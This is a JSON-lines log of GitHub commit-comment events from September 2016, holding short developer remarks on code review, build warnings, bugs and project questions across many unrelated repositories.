{"id":"4614915151","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"joakimk/toniq"},"payload":{"comment":{"id":19165328,"position":7,"line":24,"path":"lib/toniq/job_importer.ex","commit_id":"4ac2afd9ef71a2f94a258dbdb55110518db1674e","created_at":"2016-09-25T20:51:40Z","updated_at":"2016-09-25T20:51:40Z","body":"The principle of only keeping a certain number of jobs in memory at a time is probably sound, but doing it like this won't work.\r\n\r\nThe redis-query needs to load a limited set of jobs at once for it to work. I tried a bit with `sscan` without success, but it seems doable."}},"created_at":"2016-09-25T20:51:40Z"}
{"id":"4614917886","type":"CommitCommentEvent","actor":{"login":"MaximDanilov"},"repo":{"name":"MaximDanilov/GIIS"},"payload":{"comment":{"id":19165334,"position":null,"line":null,"path":null,"commit_id":"527a6f13abab58155bca48552308560d4a9fe5ae","created_at":"2016-09-25T20:53:28Z","updated_at":"2016-09-25T20:53:28Z","body":"Отлично "}},"created_at":"2016-09-25T20:53:28Z"}
{"id":"4614918050","type":"CommitCommentEvent","actor":{"login":"ndmitchell"},"repo":{"name":"haskell/filepath"},"payload":{"comment":{"id":19165335,"position":null,"line":null,"path":null,"commit_id":"07b334b406a45057a80e821e72c4b973117caae9","created_at":"2016-09-25T20:53:36Z","updated_at":"2016-09-25T20:53:36Z","body":"To quote from Cabal HEAD:\r\n\r\n> The following errors will cause portability problems on other environments:\r\n> * To use the 'extra-doc-files' field the package needs to specify at least\r\n> 'cabal-version: >= 1.18'.\r\n> Hackage would reject this package.\r\n\r\nIs Cabal lying that it's going to reject my package? If not, I have no choice but to conform..."}},"created_at":"2016-09-25T20:53:36Z"}
{"id":"4614919576","type":"CommitCommentEvent","actor":{"login":"mronian"},"repo":{"name":"timholy/Images.jl"},"payload":{"comment":{"id":19165337,"position":null,"line":null,"path":null,"commit_id":"d36527fde6bed796bfe05692ad16f7a9292fc051","created_at":"2016-09-25T20:54:35Z","updated_at":"2016-09-25T20:54:35Z","body":"I agree. Corner detection should be based on the intensity channel instead of converting the image to grayscale. (`dotc` is awesome btw :smile: )"}},"created_at":"2016-09-25T20:54:35Z"}
{"id":"4614921349","type":"CommitCommentEvent","actor":{"login":"ZanderBrown"},"repo":{"name":"ZanderBrown/Tiborcim"},"payload":{"comment":{"id":19165345,"position":null,"line":null,"path":null,"commit_id":"9c1b5b831f8c1298ec2797ef1f67dbc29aded00b","created_at":"2016-09-25T20:55:48Z","updated_at":"2016-09-25T20:55:48Z","body":"Yes! As it now works on `Windows 8.1` & `Raspbain Jessie` I'm going to assume this works everywhere"}},"created_at":"2016-09-25T20:55:48Z"}
{"id":"4614922390","type":"CommitCommentEvent","actor":{"login":"clairscent"},"repo":{"name":"waigani/codelingo_demo"},"payload":{"comment":{"id":19165349,"position":null,"line":null,"path":null,"commit_id":"f917d6c31b995375020b3074dd3fc896504b425c","created_at":"2016-09-25T20:56:29Z","updated_at":"2016-09-25T20:56:29Z","body":"overall comment"}},"created_at":"2016-09-25T20:56:29Z"}
{"id":"4614923044","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"okitec/libmangler"},"payload":{"comment":{"id":19165352,"position":null,"line":null,"path":null,"commit_id":"81a3cdac3ae265c32cd7789b8d51754f890bb812","created_at":"2016-09-25T20:56:57Z","updated_at":"2016-09-25T20:56:57Z","body":"@leletec Erhm, maybe this solves a bit of my bug from hell."}},"created_at":"2016-09-25T20:56:57Z"}
{"id":"4614923819","type":"CommitCommentEvent","actor":{"login":"laufhannes"},"repo":{"name":"Runalyze/dem-reader"},"payload":{"comment":{"id":19165356,"position":29,"line":201,"path":"src/Tests/Provider/GeoTIFF/SRTM4ProviderTest.php","commit_id":"b49a056f39880a095e254536c84c64061d258ed0","created_at":"2016-09-25T20:57:26Z","updated_at":"2016-09-25T20:57:26Z","body":"Oh, hell. And why does c9 return `3` for this position and travis returns `12.0`?"}},"created_at":"2016-09-25T20:57:26Z"}
{"id":"4614924630","type":"CommitCommentEvent","actor":{"login":"Guria"},"repo":{"name":"cerebral/cerebral"},"payload":{"comment":{"id":19165357,"position":5,"line":5,"path":"src/providers/VerifyInput.js","commit_id":"e6f404b74cc0e3a75107683dd4526c00441de927","created_at":"2016-09-25T20:57:57Z","updated_at":"2016-09-25T20:57:57Z","body":"missing import"}},"created_at":"2016-09-25T20:57:57Z"}
{"id":"4614924640","type":"CommitCommentEvent","actor":{"login":"erikerikson"},"repo":{"name":"Nordstrom/serverless"},"payload":{"comment":{"id":19165358,"position":null,"line":null,"path":null,"commit_id":"2f99b332a6bc5c05f0ad0e738bb497e15e4263b7","created_at":"2016-09-25T20:57:58Z","updated_at":"2016-09-25T20:57:58Z","body":"You are right @dougmoscrop.  That is why the following was submitted and merged:\r\nhttps://github.com/serverless/serverless/pull/2075"}},"created_at":"2016-09-25T20:57:58Z"}
{"id":"4614925704","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19165359,"position":null,"line":null,"path":null,"commit_id":"958ab074a177b453bbdb4c05fea74cc1f0567232","created_at":"2016-09-25T20:58:40Z","updated_at":"2016-09-25T20:58:40Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: OK (2323 of 2496 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-958ab074a177b453bbdb4c05fea74cc1f0567232-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-958ab074a177b453bbdb4c05fea74cc1f0567232-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.07%25-yellow.svg)</a> \n"}},"created_at":"2016-09-25T20:58:40Z"}
{"id":"4614926454","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"leletec/NameMemo"},"payload":{"comment":{"id":19165361,"position":null,"line":null,"path":null,"commit_id":"0f75a7c6afbf25ecf42d15c90de79af323959dbd","created_at":"2016-09-25T20:59:12Z","updated_at":"2016-09-25T20:59:12Z","body":"I didn't know you did this and was startled for a moment because you had a `paper.md`."}},"created_at":"2016-09-25T20:59:12Z"}
{"id":"4614929815","type":"CommitCommentEvent","actor":{"login":"haedeer"},"repo":{"name":"Haederbot/haederr_bot"},"payload":{"comment":{"id":19165364,"position":null,"line":null,"path":null,"commit_id":"b9054a1c64f90964bb15bdaffb1444f6cd2e717e","created_at":"2016-09-25T21:01:12Z","updated_at":"2016-09-25T21:01:12Z","body":"git@github.com:Haederbot/haederr_bot.😭git"}},"created_at":"2016-09-25T21:01:12Z"}
{"id":"4614930669","type":"CommitCommentEvent","actor":{"login":"uaandrei"},"repo":{"name":"uaandrei/d4232ffg"},"payload":{"comment":{"id":19165365,"position":null,"line":null,"path":null,"commit_id":"8d073011a9642da1cf0b2c7dbda7e274aa7822b7","created_at":"2016-09-25T21:01:45Z","updated_at":"2016-09-25T21:01:45Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create domain model, repository, domain model validator for Activity](https://trello.com/c/LBCSCKtp/9-create-domain-model-repository-domain-model-validator-for-activity)"}},"created_at":"2016-09-25T21:01:45Z"}
{"id":"4614931444","type":"CommitCommentEvent","actor":{"login":"KreAch3R"},"repo":{"name":"nicholaschum/substratum"},"payload":{"comment":{"id":19165368,"position":null,"line":null,"path":null,"commit_id":"102b3781ff3e82cc63d2b567917e717c2c076b2f","created_at":"2016-09-25T21:02:13Z","updated_at":"2016-09-25T21:02:13Z","body":":grinning:  :+1: "}},"created_at":"2016-09-25T21:02:13Z"}
{"id":"4614931696","type":"CommitCommentEvent","actor":{"login":"haedeer"},"repo":{"name":"Haederbot/haederr_bot"},"payload":{"comment":{"id":19165370,"position":null,"line":null,"path":null,"commit_id":"b9054a1c64f90964bb15bdaffb1444f6cd2e717e","created_at":"2016-09-25T21:02:23Z","updated_at":"2016-09-25T21:02:23Z","body":"git remote add origin git@github.com:Haederbot/haederr_bot.git\r\ngit push -u origin master "}},"created_at":"2016-09-25T21:02:23Z"}
{"id":"4614932476","type":"CommitCommentEvent","actor":{"login":"jnweiger"},"repo":{"name":"owncloud/owncloud.org"},"payload":{"comment":{"id":19165371,"position":null,"line":null,"path":null,"commit_id":"bc7f06b33a52eeadad254b00c49d3fb6e82513fd","created_at":"2016-09-25T21:02:54Z","updated_at":"2016-09-25T21:02:54Z","body":"@msrex we made an attempt to retain all the key, when switching to obs 2.7, didn't we?"}},"created_at":"2016-09-25T21:02:54Z"}
{"id":"4614933298","type":"CommitCommentEvent","actor":{"login":"DocVDL"},"repo":{"name":"DocVDL/hello-world"},"payload":{"comment":{"id":19165373,"position":null,"line":null,"path":null,"commit_id":"d81bc683268398a0c37bf4fb751ecc4e72897b79","created_at":"2016-09-25T21:03:29Z","updated_at":"2016-09-25T21:03:29Z","body":"Well!"}},"created_at":"2016-09-25T21:03:29Z"}
{"id":"4614933418","type":"CommitCommentEvent","actor":{"login":"JaredNinja"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19165374,"position":null,"line":null,"path":null,"commit_id":"e22c800edd1100582238b4c505c0d2a262c0b8c7","created_at":"2016-09-25T21:03:32Z","updated_at":"2016-09-25T21:03:32Z","body":"Awesome work!\r\n\r\nQuick question; since 6.x suggests Warlords of Draenor, will the 6.x TDB eventually contain all quests up until WoD? I noticed there are no Pandaria quests so far. Is that something being worked on by someone currently?"}},"created_at":"2016-09-25T21:03:32Z"}
{"id":"4614934160","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"drt2016/TanzschulApp"},"payload":{"comment":{"id":19165377,"position":23,"line":42,"path":"server/src/database2/ChatMessage.java","commit_id":"e8fe8ad86c81ea7a061c2e2c1f4a0ca2922996a9","created_at":"2016-09-25T21:04:02Z","updated_at":"2016-09-25T21:04:02Z","body":"Please, for the sake of my well-being, write *you* as *you*. Not doing so makes you look extremely unprofessional and makes me flinch in my seat. :pray:"}},"created_at":"2016-09-25T21:04:02Z"}
{"id":"4614936360","type":"CommitCommentEvent","actor":{"login":"Matungos"},"repo":{"name":"umano/AndroidSlidingUpPanel"},"payload":{"comment":{"id":19165381,"position":null,"line":null,"path":null,"commit_id":"384fefd4510224d4d2b6e9baf36bbb4e112962d8","created_at":"2016-09-25T21:05:33Z","updated_at":"2016-09-25T21:05:33Z","body":"ViewCompat is not a replacement for nineoldandroids.\r\n\r\nViewCompat.setTranslationY doesn't do anything in APIs below 11:\r\nhttps://developer.android.com/reference/android/support/v4/view/ViewCompat.html#setTranslationY(android.view.View, float)"}},"created_at":"2016-09-25T21:05:33Z"}
{"id":"4614936508","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"drt2016/TanzschulApp"},"payload":{"comment":{"id":19165382,"position":null,"line":null,"path":null,"commit_id":"ca9ba763283cc1ec739fa82b6baeca8d53656529","created_at":"2016-09-25T21:05:39Z","updated_at":"2016-09-25T21:05:39Z","body":":+1: for the commit name."}},"created_at":"2016-09-25T21:05:39Z"}
{"id":"4614937133","type":"CommitCommentEvent","actor":{"login":"some1563"},"repo":{"name":"some1563/TEST-REPO"},"payload":{"comment":{"id":19165386,"position":2,"line":2,"path":"README.md","commit_id":"bf4622f328a70d405bf48bee4e184289945fbba5","created_at":"2016-09-25T21:06:04Z","updated_at":"2016-09-25T21:06:04Z","body":"##### this is a test.\r\n###### this is a test.\r\n## this is a test.\r\n"}},"created_at":"2016-09-25T21:06:04Z"}
{"id":"4614937371","type":"CommitCommentEvent","actor":{"login":"MikaMouseMan"},"repo":{"name":"MikaMouseMan/king"},"payload":{"comment":{"id":19165390,"position":null,"line":null,"path":null,"commit_id":"255f281bd13b00a9392f33b24585d6055648290f","created_at":"2016-09-25T21:06:12Z","updated_at":"2016-09-25T21:06:12Z","body":"Добавил строку"}},"created_at":"2016-09-25T21:06:12Z"}
{"id":"4614939757","type":"CommitCommentEvent","actor":{"login":"andreleite"},"repo":{"name":"blockchaindream/blockchain-to-sqlite"},"payload":{"comment":{"id":19165397,"position":null,"line":null,"path":null,"commit_id":"767213d2a307d4bb94f48a23ca57da9f6873d9ec","created_at":"2016-09-25T21:07:54Z","updated_at":"2016-09-25T21:07:54Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create npm module to extract blockchain info to sqlite](https://trello.com/c/CFD3kr1a/5-create-npm-module-to-extract-blockchain-info-to-sqlite)"}},"created_at":"2016-09-25T21:07:54Z"}
{"id":"4614939922","type":"CommitCommentEvent","actor":{"login":"andreleite"},"repo":{"name":"blockchaindream/blockchain-to-sqlite"},"payload":{"comment":{"id":19165398,"position":null,"line":null,"path":null,"commit_id":"864f3f9d61a723c44b0b47b3d63d058232e1cc94","created_at":"2016-09-25T21:08:02Z","updated_at":"2016-09-25T21:08:02Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create npm module to extract blockchain info to sqlite](https://trello.com/c/CFD3kr1a/5-create-npm-module-to-extract-blockchain-info-to-sqlite)"}},"created_at":"2016-09-25T21:08:02Z"}
{"id":"4614942537","type":"CommitCommentEvent","actor":{"login":"MarkBennett"},"repo":{"name":"ExchangeJS/speakers"},"payload":{"comment":{"id":19165411,"position":20,"line":17,"path":"README.md","commit_id":"ad1bcfee11b52ddfe7f2344da2cc51c0b943d5da","created_at":"2016-09-25T21:09:52Z","updated_at":"2016-09-25T21:09:52Z","body":"@CAYdenberg I'm fine with people using whatever they want, as long as they can present it at the meetup and provide us a link we can use later.\r\n\r\nI'll also add Google Slides to this list as I know that's what a few of our members use as well as the others.\r\n\r\nWe should also mention the slide templates somewhere on this page once we've got one put together."}},"created_at":"2016-09-25T21:09:52Z"}
{"id":"4614943597","type":"CommitCommentEvent","actor":{"login":"MarkBennett"},"repo":{"name":"ExchangeJS/speakers"},"payload":{"comment":{"id":19165417,"position":25,"line":21,"path":"README.md","commit_id":"ad1bcfee11b52ddfe7f2344da2cc51c0b943d5da","created_at":"2016-09-25T21:10:34Z","updated_at":"2016-09-25T21:10:34Z","body":"I like the emphasis on this line, can we do this on all the notes?"}},"created_at":"2016-09-25T21:10:34Z"}
{"id":"4614946113","type":"CommitCommentEvent","actor":{"login":"DDuarte"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19165427,"position":null,"line":null,"path":null,"commit_id":"e22c800edd1100582238b4c505c0d2a262c0b8c7","created_at":"2016-09-25T21:12:15Z","updated_at":"2016-09-25T21:12:15Z","body":"All the quests from MoP and WoD are \"included\" (and most of the quests from Legion as well). They might not be scripted tho."}},"created_at":"2016-09-25T21:12:15Z"}
{"id":"4614946218","type":"CommitCommentEvent","actor":{"login":"MarkBennett"},"repo":{"name":"ExchangeJS/speakers"},"payload":{"comment":{"id":19165428,"position":34,"line":37,"path":"README.md","commit_id":"ad1bcfee11b52ddfe7f2344da2cc51c0b943d5da","created_at":"2016-09-25T21:12:20Z","updated_at":"2016-09-25T21:12:20Z","body":"Good touch @CAYdenberg! 👍 "}},"created_at":"2016-09-25T21:12:20Z"}
{"id":"4614947483","type":"CommitCommentEvent","actor":{"login":"Flarp"},"repo":{"name":"Flarp/Distri-Node"},"payload":{"comment":{"id":19165435,"position":null,"line":null,"path":null,"commit_id":"57b2e852c8d764e5a665e4421f97ee623f775d9f","created_at":"2016-09-25T21:13:07Z","updated_at":"2016-09-25T21:13:07Z","body":"#1 "}},"created_at":"2016-09-25T21:13:07Z"}
{"id":"4614949240","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19165443,"position":28,"line":28,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T21:14:14Z","updated_at":"2016-09-25T21:14:14Z","body":"Oh I think you are mistaken. The program will still run without the canSolve method. It just won't do what you want it to. You can't run the program without the main method though."}},"created_at":"2016-09-25T21:14:14Z"}
{"id":"4614950970","type":"CommitCommentEvent","actor":{"login":"jackregnart"},"repo":{"name":"finddx/cdx"},"payload":{"comment":{"id":19165449,"position":4,"line":47,"path":"cdx_vietnam/app/assets/javascripts/application.js","commit_id":"834ca514931c781160480d7e64d3774ce39eae2f","created_at":"2016-09-25T21:15:25Z","updated_at":"2016-09-25T21:15:25Z","body":"I'm not sure why this was removed. It seemed to disappear during the copy of application.js into cdx_vietnam.... Given that this `application.js` now overrides the cdx_core one we were losing the top left dropdown without it. Someone should speak up if I've added this back in error. :)"}},"created_at":"2016-09-25T21:15:25Z"}
{"id":"4614951400","type":"CommitCommentEvent","actor":{"login":"Rosiedymock"},"repo":{"name":"Rosiedymock/helloworld2"},"payload":{"comment":{"id":19165451,"position":2,"line":2,"path":"README.md","commit_id":"9bff7a83ddd433d88a4ebfdedcf7a560f13f7b81","created_at":"2016-09-25T21:15:43Z","updated_at":"2016-09-25T21:15:43Z","body":"hi there, my name is Rosie Dymock, I am 29 years old. I have a 12 year old daughter, which is the reason I work, so that I can afford a better life for us both. "}},"created_at":"2016-09-25T21:15:43Z"}
{"id":"4614951932","type":"CommitCommentEvent","actor":{"login":"rastating"},"repo":{"name":"rastating/wordpress-exploit-framework"},"payload":{"comment":{"id":19165453,"position":null,"line":null,"path":null,"commit_id":"db9792e2d19bb4cb928e2c55d02a2725320775f4","created_at":"2016-09-25T21:16:04Z","updated_at":"2016-09-25T21:16:04Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add WooCommerce order disclosure export module](https://trello.com/c/uzigHuaN/17-add-woocommerce-order-disclosure-export-module)"}},"created_at":"2016-09-25T21:16:04Z"}
{"id":"4614952264","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19165456,"position":64,"line":64,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T21:16:16Z","updated_at":"2016-09-25T21:16:16Z","body":"`if (filledColumns[column]) {`\r\n\r\nSTOP CHECKING IF A BOOLEAN IS EQUAL TO TRUE!!!"}},"created_at":"2016-09-25T21:16:16Z"}
{"id":"4614953272","type":"CommitCommentEvent","actor":{"login":"ramapcsx2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19165458,"position":null,"line":null,"path":null,"commit_id":"013940250bd8aaa4beee90f418d7a4673981efbd","created_at":"2016-09-25T21:16:51Z","updated_at":"2016-09-25T21:16:51Z","body":"It's interesting that the psx logo hangs if trigDma = 1 (and the check for it removed).\r\nI really need you to work on this stuff, btw ;p"}},"created_at":"2016-09-25T21:16:51Z"}
{"id":"4614954306","type":"CommitCommentEvent","actor":{"login":"sangisos"},"repo":{"name":"goccmack/gocc"},"payload":{"comment":{"id":19165464,"position":null,"line":null,"path":null,"commit_id":"a8a9bd1702390e2c27358703b48191ebc08c6c55","created_at":"2016-09-25T21:17:38Z","updated_at":"2016-09-25T21:17:38Z","body":"Ignore this commit, replaced by https://github.com/sangisos/gocc/commit/e3f85c18a03d9da89bb5dc2209b3463e6df1a612"}},"created_at":"2016-09-25T21:17:38Z"}
{"id":"4614955250","type":"CommitCommentEvent","actor":{"login":"JaredNinja"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19165468,"position":null,"line":null,"path":null,"commit_id":"e22c800edd1100582238b4c505c0d2a262c0b8c7","created_at":"2016-09-25T21:18:16Z","updated_at":"2016-09-25T21:18:16Z","body":"Thank you for your answer and time.\r\n\r\nIf this is not the right place, just let me know how to contact you otherwise.\r\n\r\nToday I compiled the core and built a fresh DB. I'm using the latest client 7.0.3 22624(?). I'll check again, I'm sure the fault is on my part.\r\n\r\nOr does \"not scripted\" mean they are indeed not playable, yet, in some form prepared?"}},"created_at":"2016-09-25T21:18:16Z"}
{"id":"4614955353","type":"CommitCommentEvent","actor":{"login":"joshca1"},"repo":{"name":"fural/whosin"},"payload":{"comment":{"id":19165469,"position":null,"line":null,"path":null,"commit_id":"d658d0466ec91e41e3f174383bfe17eb9a9fb783","created_at":"2016-09-25T21:18:21Z","updated_at":"2016-09-25T21:18:21Z","body":"gg"}},"created_at":"2016-09-25T21:18:21Z"}
{"id":"4614956027","type":"CommitCommentEvent","actor":{"login":"deavmi"},"repo":{"name":"SeerUK/reverb"},"payload":{"comment":{"id":19165474,"position":null,"line":null,"path":null,"commit_id":"cfb220e8d5bdad5d6293ae8c66d426cc670e5cac","created_at":"2016-09-25T21:18:52Z","updated_at":"2016-09-25T21:18:52Z","body":"Thanks m8"}},"created_at":"2016-09-25T21:18:52Z"}
{"id":"4614957097","type":"CommitCommentEvent","actor":{"login":"jackregnart"},"repo":{"name":"finddx/cdx"},"payload":{"comment":{"id":19165478,"position":8,"line":203,"path":"cdx_core/app/models/encounter.rb","commit_id":"834ca514931c781160480d7e64d3774ce39eae2f","created_at":"2016-09-25T21:19:37Z","updated_at":"2016-09-25T21:19:37Z","body":"Suggest perhaps leaving out the 'of' and replacing with '/' to avoid unnecessary translation.\r\n\r\nAlso, two counts per row not ideal. But, only seems to add about 5-15ms to a 10-row table. Could possibly do with a rethink down the line to make it more efficient. If you're not adverse to counter_cache on these columns, it would also help with sorting (which I've currently disabled for this column)."}},"created_at":"2016-09-25T21:19:37Z"}
{"id":"4614957823","type":"CommitCommentEvent","actor":{"login":"elnjensen"},"repo":{"name":"openaps/oref0"},"payload":{"comment":{"id":19165485,"position":null,"line":null,"path":null,"commit_id":"3f4c205cb5e88c59d229994cfe9c52e1871cf5da","created_at":"2016-09-25T21:20:05Z","updated_at":"2016-09-25T21:20:05Z","body":"Scott, it looks like adding this warning has caused a warning to pop up in running the meal report with the new setup.   If I install a new openaps instance with the setup script and run `openaps report invoke monitor/meal.json` I get a bunch of lines like this:\r\n\r\n```\r\npi@raspberrypi:~/myopenaps_advanced $ openaps report invoke monitor/meal.json\r\nmeal://text/shell/monitor/meal.json\r\nRemoved duplicate bolus/carb entries:3\r\n35 0 Sun Sep 25 2016 14:19:12 GMT-0400 (EDT)\r\nSun Sep 25 2016 16:29:23 GMT-0400 (EDT)\r\nWarning: clock input is unzoned; please pass clock-zoned.json instead\r\n-Sun Sep 25 2016 16:24:21 GMT-0400 (EDT)\r\nWarning: clock input is unzoned; please pass clock-zoned.json instead\r\n-Sun Sep 25 2016 16:19:21 GMT-0400 (EDT)\r\nWarning: clock input is unzoned; please pass clock-zoned.json instead\r\n```\r\netc. \r\n\r\nMy `clock-zoned.json` looks fine; it contains this:  `\"2016-09-25T17:02:34-04:00\"`\r\n\r\nSo I'm not sure what process/device is passing the time into this code, but it is formatting the timezone differently (assuming that the times printed above reflect how the code is also seeing them).  If that's the case, then just making the colon optional in the regex here would fix the issue. "}},"created_at":"2016-09-25T21:20:05Z"}
{"id":"4614958260","type":"CommitCommentEvent","actor":{"login":"DDuarte"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19165486,"position":null,"line":null,"path":null,"commit_id":"e22c800edd1100582238b4c505c0d2a262c0b8c7","created_at":"2016-09-25T21:20:21Z","updated_at":"2016-09-25T21:20:21Z","body":"Join us on IRC: channel #trinity on Rizon network (irc.rizon.net) https://trinitycore.atlassian.net/wiki/display/tc/IRC"}},"created_at":"2016-09-25T21:20:21Z"}
{"id":"4614960421","type":"CommitCommentEvent","actor":{"login":"haf"},"repo":{"name":"logary/logary"},"payload":{"comment":{"id":19165492,"position":52,"line":1546,"path":"src/Logary/DataModel.fs","commit_id":"0973f48a9f6f23f175da775321a3569035cac11a","created_at":"2016-09-25T21:21:42Z","updated_at":"2016-09-25T21:21:42Z","body":"lower-case. How about using the previous name `format...`?"}},"created_at":"2016-09-25T21:21:42Z"}
{"id":"4614960762","type":"CommitCommentEvent","actor":{"login":"haf"},"repo":{"name":"logary/logary"},"payload":{"comment":{"id":19165493,"position":11,"line":20,"path":"src/tests/Logary.Tests/Formatting.fs","commit_id":"0973f48a9f6f23f175da775321a3569035cac11a","created_at":"2016-09-25T21:21:56Z","updated_at":"2016-09-25T21:21:56Z","body":"lowercase fields"}},"created_at":"2016-09-25T21:21:56Z"}
{"id":"4614961009","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"cburd87/Stockfish"},"payload":{"comment":{"id":19165494,"position":null,"line":null,"path":null,"commit_id":"28593ffb339cef7baba476d8463e8b80681701c0","created_at":"2016-09-25T21:22:05Z","updated_at":"2016-09-25T21:22:05Z","body":"Your current tuning patch is incorrect.\r\nThe expression  1/(100-ply) is always 0.\r\nSee explanations on...\r\nhttps://github.com/cburd87/Stockfish/commit/19985a667b6c39b57cce38ebaf51a5bcfc838a78\r\n\r\nYou should use 1/(100.0 - ply)\r\nor better,\r\n(100.0 - pos.rule50_count()) / (100.0 - ply)"}},"created_at":"2016-09-25T21:22:05Z"}
{"id":"4614962536","type":"CommitCommentEvent","actor":{"login":"rastating"},"repo":{"name":"rastating/wordpress-exploit-framework"},"payload":{"comment":{"id":19165496,"position":null,"line":null,"path":null,"commit_id":"ca97d3e1830bf9b07b7342501f14dc34c5d9ad21","created_at":"2016-09-25T21:23:02Z","updated_at":"2016-09-25T21:23:02Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add W3 Total Cache <= 0.9.4.1 reflected XSS module](https://trello.com/c/w8cjfrqt/15-add-w3-total-cache-0-9-4-1-reflected-xss-module)"}},"created_at":"2016-09-25T21:23:02Z"}
{"id":"4614965690","type":"CommitCommentEvent","actor":{"login":"agusmakmun"},"repo":{"name":"ashutosh2k12/hcz-jekyll-blog"},"payload":{"comment":{"id":19165505,"position":null,"line":null,"path":null,"commit_id":"3dea5799410f10be3e96dacb9a1c811ac63d46db","created_at":"2016-09-25T21:25:14Z","updated_at":"2016-09-25T21:25:14Z","body":"@vietanhdev the output of `{{ site.baseurl }}` it will be `/`. i assume to use `/category/{{ category }}` or `{{ site.baseurl }}category/{{ category }}` such as this: https://github.com/agusmakmun/agusmakmun.github.io/blob/master/_layouts/post.html#L8"}},"created_at":"2016-09-25T21:25:14Z"}
{"id":"4614965815","type":"CommitCommentEvent","actor":{"login":"kafejo"},"repo":{"name":"zvonicek/MVVMTestProject"},"payload":{"comment":{"id":19165507,"position":22,"line":22,"path":"testMVVM/Coordinator.swift","commit_id":"0133a6dbe12cc0a04674def2aba8888b21d981c5","created_at":"2016-09-25T21:25:18Z","updated_at":"2016-09-25T21:25:18Z","body":"why so complicated? Why not read-only var?\r\n```swift\r\nvar coordinator: Coordinator? { get }\r\n```\r\nThen you don't have to implement the \"getter\" method in all conforming view controllers. just declaring variable is enough\r\n```swift\r\nclass ViewController: UIViewController: Coordinated {\r\n    var coordinator: SeasonDetailCoordinator?\r\n}\r\n```"}},"created_at":"2016-09-25T21:25:18Z"}
{"id":"4614966325","type":"CommitCommentEvent","actor":{"login":"CAYdenberg"},"repo":{"name":"ExchangeJS/speakers"},"payload":{"comment":{"id":19165508,"position":25,"line":21,"path":"README.md","commit_id":"ad1bcfee11b52ddfe7f2344da2cc51c0b943d5da","created_at":"2016-09-25T21:25:40Z","updated_at":"2016-09-25T21:25:40Z","body":"Not sure I follow ... you mean have some bold text on each line to improve scanability? (that's a thing)."}},"created_at":"2016-09-25T21:25:40Z"}
{"id":"4614966809","type":"CommitCommentEvent","actor":{"login":"GiovanniCDA"},"repo":{"name":"SACompanion/translations"},"payload":{"comment":{"id":19165509,"position":null,"line":null,"path":null,"commit_id":"93ba22ee93d89131acfcc57164ee56cdb3eef7c4","created_at":"2016-09-25T21:26:01Z","updated_at":"2016-09-25T21:26:01Z","body":"I just translate several, but it looks like my work was wiped out, what happened?"}},"created_at":"2016-09-25T21:26:01Z"}
{"id":"4614969020","type":"CommitCommentEvent","actor":{"login":"MarkBennett"},"repo":{"name":"ExchangeJS/speakers"},"payload":{"comment":{"id":19165514,"position":25,"line":21,"path":"README.md","commit_id":"ad1bcfee11b52ddfe7f2344da2cc51c0b943d5da","created_at":"2016-09-25T21:27:34Z","updated_at":"2016-09-25T21:27:34Z","body":"You said much better than I did, but yes. ;)"}},"created_at":"2016-09-25T21:27:34Z"}
{"id":"4614969341","type":"CommitCommentEvent","actor":{"login":"CAYdenberg"},"repo":{"name":"ExchangeJS/speakers"},"payload":{"comment":{"id":19165515,"position":20,"line":17,"path":"README.md","commit_id":"ad1bcfee11b52ddfe7f2344da2cc51c0b943d5da","created_at":"2016-09-25T21:27:46Z","updated_at":"2016-09-25T21:27:46Z","body":"Hmmm ... so we're going to rely on speakers to host their own slides in future? This is fine, but probably will lead to broken links over time."}},"created_at":"2016-09-25T21:27:46Z"}
{"id":"4614970118","type":"CommitCommentEvent","actor":{"login":"AdFad666"},"repo":{"name":"mozilla-b2g/gaia"},"payload":{"comment":{"id":19165517,"position":null,"line":null,"path":null,"commit_id":"975a35c0f5010df341e96d6c5ec60217f5347412","created_at":"2016-09-25T21:28:16Z","updated_at":"2016-09-25T21:28:16Z","body":"You removed my beautiful logos! :sob: "}},"created_at":"2016-09-25T21:28:16Z"}
{"id":"4614970643","type":"CommitCommentEvent","actor":{"login":"zvonicek"},"repo":{"name":"zvonicek/MVVMTestProject"},"payload":{"comment":{"id":19165518,"position":22,"line":22,"path":"testMVVM/Coordinator.swift","commit_id":"0133a6dbe12cc0a04674def2aba8888b21d981c5","created_at":"2016-09-25T21:28:38Z","updated_at":"2016-09-25T21:28:38Z","body":"I'm planning to create a PR so we can discuss this things there. In this specific case -- I of course considered your idea, but haven't managed to force Swift compiler to overwrite property with more concrete type (Coordinator -> SeasonDetailCoordinator). Did you?"}},"created_at":"2016-09-25T21:28:38Z"}
